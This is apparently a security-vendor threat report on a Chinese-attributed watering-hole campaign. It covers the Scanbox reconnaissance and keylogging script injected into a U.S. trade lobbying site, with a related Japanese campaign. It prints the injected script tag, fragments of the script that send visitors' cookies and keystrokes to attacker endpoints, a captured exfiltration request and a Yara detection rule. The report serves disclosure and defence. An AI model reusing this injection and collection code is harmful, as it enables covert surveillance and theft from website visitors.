The Fidelis Threat Research team is comprised of expert security researchers whose sole focus is generating accurate and actionable intelligence to better secure customers. Together, they represent over... Read More
Comments
In late February, Fidelis Cybersecurity observed a strategic web compromise on a prominent U.S. lobbying group that served up malware to a very specific set of targets. The malware we observed has been used exclusively by Chinese nation-state threat actors in our observation and according to previously published research.
Based on our observations, we estimate that it is highly probable that this activity – which we’re calling ‘Operation TradeSecret’ — targeted key private-sector players involved in lobbying efforts around United States’ foreign trade policy. Subsequent research has led us to recover artifacts that indicate that a similar operation was conducted by threat actors targeting government officials in Japan. The connections we can draw from the Japanese campaign lead us to estimate that it is highly probable that the actors involved are known as APT10 (aka Stone Panda) in the threat research community.
Trade policy was at the center of the recent U.S. presidential election and is sure to feature prominently on the agenda when President Trump meets for the first time with China President Xi Jinping in Florida this week.
This paper documents our findings around the live campaign we observed, as well as technical details to allow other researchers to extend visibility into these actions. Fidelis Cybersecurity products detect all activity described in this report.
Fidelis observed, between February 27 and March 1, specific pages on the website of the National Foreign Trade Council (NFTC) including a link that led to a remote script that would execute when anyone visited that page. That remote script was the Scanbox framework, a well-known web reconnaissance tool that has been observed in previous campaigns dating back to at least 2014.
We first observed the inject on the registration page for a board of directors meeting in Washington D.C., scheduled for March 7, 2017.
The injected link would run the Scanbox framework on the computer of anyone who visited the web page.
Scanbox provides multiple capabilities to threat actors. It can be used to determine the versions of applications, as well as other selected tools, such as JavaScript keyloggers, running on the target’s machine. The information gathered with this reconnaissance can be used in phishing campaigns directed toward targeted individuals. These campaigns can then exploit specific vulnerabilities known to exist within the user’s applications.
The injected link led to a site called personanddog[ . ]info. This domain was registered on January 1, 2017. The malicious JavaScript was served up from the sub-domain club.personanddog[ . ]info, which was directed to a non-routable IP address on March 1, 2017. The site itself was hosted at the IP address 198.100.119[ . ]4.
The link from the NFTC site was removed on March 2. In our observation, the link was removed after the Scanbox site was taken down. We believe that the operation had almost certainly concluded by that time.
Scanbox was previously reported to have been used by multiple Chinese actor groups that are believed to be state sponsored, including the ones thought to be behind well-publicized intrusions in recent years — namely, the Anthem Healthcare and the U.S. Office of Personnel Management (OPM) breaches.
Fidelis has made other previous observations of Scanbox in various campaigns. In the most recent incident, we observed that it was inserted on a Uygher cultural news site. The Uyghers are an ethnic minority group in Xinjiang province in China, where a struggle for political rights has been ongoing for a few decades. In that instance, the framework was hosted here: support1.freetcp[ . ]com.
These organizations represent some of the largest U.S. private sector companies that, presumably, have a keen interest in U.S. trade policy. Since the strategic web compromise was observed on the registration page for the board of directors meeting, it can be surmised that the campaign targeted the individuals visiting the site to register for the meeting.
NFTC members have been key participants in the dialogue around the composition of the new trade policy framework being formulated within the Trump administration. One example of this is the advocacy for the appointment of a new U.S. Trade Representative, as evidenced by this statement issued by the Chair of the NFTC on February 13.
All organizations that have representatives on the board of directors of the NFTC — or those who would have a reason to visit the site — should investigate potentially impacted hosts using indicators provided in this report. Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks — such as spearphishing campaigns.
Fidelis Cybersecurity conveyed its findings to the NFTC shortly after our initial observations.
ScanBox is a framework written in JavaScript and PHP that allows an attacker to perform reconnaissance and key logging of visitors to a compromised website without requiring any malware to be downloaded or installed. According to PwC, the ScanBox framework has been utilized by a number of groups who conduct espionage attacks, e.g. groups that include those behind the 2014/15 Forbes and Anthem attacks. Some of the actors known to have used it are called C0d0s0 and Deep Panda within the research community.
According to PwC and AlienVault, the Scanbox framework has various plugins that will load depending on the browser.
Plugins:
* Software reconnaissance / Enumeration
* Browser plugin (Browser version)
* Adobe Flash recon / Enumerates Adobe Flash versions
* Adobe PDF reader recon / Enumerates Acrobat Reader versions
* SharePoint recon
* Chrome security plugins recon
* Microsoft Office recon / Enumerates Microsoft Office versions
* Java recon / Enumerates Java versions
* Internal IP recon
* JavaScript keylogger (Implements a keylog functionality trough JavaScript that logs all the keystrokes the victim is typing inside the compromised website. No malware executable needs to be deployed to the system.
Other features identified are:
* Operating system id
* Local Time on the system
* Language settings
* Antivirus installed
Reconnaissance is used to allow attackers to later launch attacks against system vulnerabilities based on data obtained from the system.
In the NTFC page, the injected code was:
<script src=hxxp://club.personanddog [ . ] info/file/i/?1>
The above reference point to “1.js” in that server. Research on this domain lead us to the following “1.js” file at VT, which appears to be the one hosted at the above referenced domain: c88b11367a1f4625d4e7a8fb3a45f4c5.
The “1.js” file was first submitted to VirusTotal and Hybrid-Analysis[ . ]com on March 1, 2017. As of March 7, 2017, this Scanbox script has zero (0) AV detections as observed by a popular scanner. During analysis of the script, we discovered that this is an obfuscated version of the Scanbox script. Key changes have been made to variables in order to bypass classic signature detections.
When the observed Scanbox script runs, the visitor’s system is observed performing the following requests:
The “1.js” Scanbox script (MD5: c88b11367a1f4625d4e7a8fb3a45f4c5) contains obfuscated JavaScript obfuscated code.
To draw a clear connection between the de-obfuscated version of the 1.js script and the raw Scanbox script, consider the following section from the code:
var NztCm_NcDkh={};
NztCm_NcDkh[basicposturl]=hxxp://club.personanddog[ . ]info/file/i/recv.php;
NztCm_NcDkh[basicliveurl]=hxxp://club.personanddog[ . ]info/file/i/s.php;
NztCm_NcDkh[basicplguinurl]=hxxp://club.personanddog[ . ]info/file/i/p.php;
NztCm_NcDkh[basicposturlkeylogs]=hxxp://club.personanddog[ . ]info/file/i/k.php;
NztCm_NcDkh[info] = {};
NztCm_NcDkh[info][projectid]=1;
NztCm_NcDkh[info][seed]=__$_$_$_$__$_618__$_$_$_$__$_128();
NztCm_NcDkh[info][ip] = [ip_of_visitor_removed_by_analyst];
NztCm_NcDkh[info][referrer] = window[document][referrer];
NztCm_NcDkh[info][agent] = window[navigator][userAgent];
NztCm_NcDkh[info][location] = window[location][href];
NztCm_NcDkh[info][toplocation] = window[top][location][href];
NztCm_NcDkh[info][cookie] = window[document][cookie];
NztCm_NcDkh[info][title] = window[document][title];
NztCm_NcDkh[info][domain] = window[document][domain];
NztCm_NcDkh[info][charset] = window[document][characterSet] ? window[document][characterSet]: window[document][charset];
NztCm_NcDkh[info][screen] = function()
After making some replacements, the following segment of the code will clearly look like the Scanbox script that has been reported by multiple researchers:
var scanbox={};
scanbox.basicposturl]=hxxp://club.personanddog[ . ]info/file/i/recv.php;
scanbox.basicliveurl]=hxxp://club.personanddog[ . ]info/file/i/s.php;
scanbox.basicplguinurl]=hxxp://club.personanddog[ . ]info/file/i/p.php;
scanbox.basicposturlkeylogs]=hxxp://club.personanddog[ . ]info/file/i/k.php;
scanbox.info] = {};
scanbox.info.projectid=1;
scanbox.info.seed=setRecordid();
scanbox.info.ip = [ip_of_visitor_removed_by_analyst];
scanbox.info.referrer = document.referrer;
scanbox.info.agent = navigator.userAgent;
scanbox.info.location = location.href;
scanbox.info.toplocation = top.location.href;
scanbox.info.cookie = document.cookie;
scanbox.info.title = document.title;
scanbox.info.domain = document.domain;
scanbox.info.charset = document.characterSet ? document.characterSet: document.charset;
scanbox.info.screen = function()
Open-source research led us to discover multiple requests associated with the Scanbox domain.
This information lead us to believe that the Scanbox script could have also been injected in the following pages on the NTFC website:
Report completed on “2017-02-27 15:16:39 CET”
Referer: www[ . ]nftc[ . ]org/calendar/calendar.asp?Mode=CalendarViewDetails&ID=847
Page info recorded:
NTFC Board of Directors Meeting
March 7, 2016
9:00 am – 1:00 pm
Hosted by Google
Report completed on “2017-02-28 00:14:04 CET”
Referer: www[ . ]nftc[ . ]org/calendar/calendar.asp?Mode=CalendarViewDetails&ID=861
Page info recorded:
NTFC Board Dinner with Mexico’s Ambassador, Geronimo Gutierrez (By Invitation)
March 7th
RSVP
Report completed on “2017-02-28 09:19:36 CET”
Referer: www[ . ]nftc[ . ]org/?id=1
Report completed on “2017-02-28 11:20:37 CET”
Referer: www[ . ]nftc[ . ]org/?id=1
Report completed on “2017-03-01 01:53:08 CET”
Referer: www[ . ]nftc[ . ]org/newsflash/newsflash.asp?id=236&mode=View&articleid=3222
Page info recorded:
NFTC Welcomes New Chairman Ambassador Alan Wolf
Date: 3/1/2011
Written by: Jennifer Cummings, The Fratelli Group for NFTC, (202) 822-9491
As we expanded our research scope, we found the following Scanbox script: b344820e8f719d22bf8d6f939bc40b44. The script appears to have been submitted from an IP address in South Korea on March 14, 2017. As of that day, there were zero (0) AV detections for this obfuscated JavaScript script by the fifty-five (55) AV engines running at VirusTotal.
It should be noted that we have discovered this artifact in a malware repository and not in a live operation. We have also observed that it uses the precise JavaScript obfuscation technique that we decoded in the NFTC site inject.
When the script is accessed, the victim system beaconed to www[ . ]anzen.mofa-go-jp[ . ]com, a site that is masquerading as anzen.mofa.go.jp, a site on the Ministry’s website focused on Overseas Safety. It should be noted that this domain is specifically listed in the Operation CloudHopper report.
The following traffic was observed:
POST /images/i/recv.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: [removed_by_analyst] Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: www[ . ]anzen.mofa-go-jp[ . ]com
Content-Length: 689
Connection: Keep-Alive
Cache-Control: no-cache
projectidx-87283=Mg%3D%3D&seedx-87283=MTE0NDE0OTAyOTUxMTE2NTY%3D&ipx-87283=MTA0LjIzNi4yMjMuMTYw&referrerx-87283=&agentx-87283=TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMTsgU1YxOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuMC4wNDUwNi42NDg7IC5ORVQgQ0xSIDMuNS4yMTAyMjsgLk5FVDQuMEMp&locationx-87283=[base64_data_removed_by_analyst]&toplocationx-87283=[base64_data_removed_by_analyst]&cookiex-87283=cmVjb3JkaWQ9MTE0NDE0OTAyOTUxMTE2NTY%3D&titlex-87283=&domainx-87283=[base64_data_removed_by_analyst]%3D&charsetx-87283=d2luZG93cy0xMjUy&screenx-87283=MTY3Mng4MDU%3D&platformx-87283=V2luMzI%3D&langx-87283=ZW4tdXM%3D&random=x-87283
The following Yara rule could be used to detect the obfuscated version of the Scanbox Framework script observed in this research:
rule apt_all_JavaScript_ScanboxFramework_obfuscated
{
strings:
$sa1 = /(var|new|return)s[_$]+s?/
$sa2 = “function”
$sa3 = “toString“
$sa4 = “toUpperCase”
$sa5 = “arguments.length”
$sa6 = “return”
$sa7 = “while”
$sa8 = “unescape(“
$sa9 = “365*10*24*60*60*1000”
$sa10 = “>> 2”
$sa11 = “& 3) << 4”
$sa12 = “& 15) << 2”
$sa13 = “>> 6) | 192”
$sa14 = “& 63) | 128”
$sa15 = “>> 12) | 224”
condition:
all of them
}
